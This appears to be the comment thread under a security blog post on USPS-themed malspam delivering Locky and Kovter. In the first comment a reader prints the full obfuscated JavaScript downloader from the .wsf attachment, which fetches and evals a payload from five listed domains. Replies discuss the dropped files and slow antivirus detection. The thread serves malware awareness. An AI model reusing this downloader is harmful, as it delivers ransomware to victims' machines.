Comments

Spoofed USPS unable to deliver malspam continues to deliver Locky, Kovter and other malware — 6 Comments

  1. In the last two days, I have received two e-mail, both containing a compressed zip file, containing a .doc.wsf file.

    These mail where sent from different domains / e-mail addresses (gilbert.pennington@stagingpc.com and warren.butler@wijnvoorraad.nl) and both claimed that they represent USPS support management department.

    As a IT support and network infrastructure administration professional (and also due to only working within a Linux / open source based environment), I decompress these files and had a look using Libreoffice (within a sandboxed based visualised computer, I do not own and refuse to use any Microsoft products, therefore do not use MS Word or any MS Windows operating system).

    I can confirm that the file does contain what looks like some Javascript coding. The file contains the code as displayed below:

    function rox() { return “7656238”; }; function
    gag() { return “Msxml2.XMLHTTP”; }; var x = new
    Array(“sabedoriaalternativa.pt”,”dcregs.org”,”inflation.us”,”acpu.com.br”,
    “bilderbergska.org”); function rov() { return “counter”; } function cou() {
    return “/”+rov()+”/?a=”; }; function fiv() { return “a”; }; function cay(z) { z
    = z.split(rox()); z = z.join(fiv()); eval(z); }; function boe() { return
    “&i=LZCbj-mu-KARAKsEbTN4GoA9ZAuPDVEoJkV1mzh4jkqy_tEsNBEm-r2H60bGCFIfnv-
    4uYqgZur5ybTDSvVUW7Mt”; }; function htt() { return “http://”; }; function sut()
    { return “1D9Hq8gb1bfLs9C1J3HbGW3KVXTDrCdYd4&m=”; }; function tog(x) { return
    htt() + x + cou() + sut() + rox() + boe(); }; for (var i=0; i<5; i++) { try {
    var e = new ActiveXObject(gag()); e.open("GET", tog(x[i]), false); e.send(); if
    (e.status == 200) { cay(e.responseText); break; }; } catch(e) { };
    };

    I am glad that I am an experienced IT professional that can easily identify spam mail (as well as being happy that I do not use MS Internet Explorer or MS Office – and therefore this script does not effect my workstation or any of my IT infrastructure).

    • Sorry Jesse, I disagree. These currently deliver 5 files 2 are innocent php interpreters. 1 is a php file detailing the file extensions to encrypt. 1 is Kovter, 1 is Locky see https://myonlinesecurity.co.uk/spoofed-fedex-and-usps-kovter-and-locky-sites/ for latest details. There have been some versions delivering plain nemucod ransomware, but I haven’t seen one of those in about 3 weeks. You will probably find different “affiliates” distribute different version in different countries

        • These are proving to be a complete pain in the *** Fairly low level of malspam emails so not getting quickly picked up by spam filters and antivirus companies. They are just starting to wake up to them now after 3 weeks of daily submissions. The emails have been used for so long, that most users ( and a lot of researchers) just bin them without even looking at them.

Leave a Reply

Your email address will not be published. Required fields are marked *